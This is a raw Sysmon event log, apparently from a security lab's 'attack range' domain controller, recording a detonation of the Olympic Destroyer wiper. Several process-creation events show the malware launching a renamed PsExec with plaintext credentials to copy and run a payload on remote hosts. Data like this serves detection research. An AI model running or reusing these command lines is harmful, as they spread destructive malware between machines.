10:56:46.866{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.866{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.866{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.844{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.844{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.844{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.844{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.829{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-8005-000000003802}5588C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.829{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-8005-000000003802}5588C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.829{C8EA50B7-12EE-6216-8005-000000003802}55885896C:\Windows\system32\conhost.exe{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.813{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.813{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.821{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.813{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.813{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 534500x8000000000000000291186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.813{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.813{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.814{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.813{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.797{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-8005-000000003802}5588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 534500x8000000000000000291181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.797{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.797{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-8005-000000003802}5588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.797{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.797{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:46.782{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.728{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-7E05-000000003802}4000C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.728{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-7E05-000000003802}4000C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.712{C8EA50B7-12EE-6216-7E05-000000003802}40005960C:\Windows\system32\conhost.exe{C8EA50B7-12EE-6216-7D05-000000003802}6912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.681{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.681{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.681{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.681{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 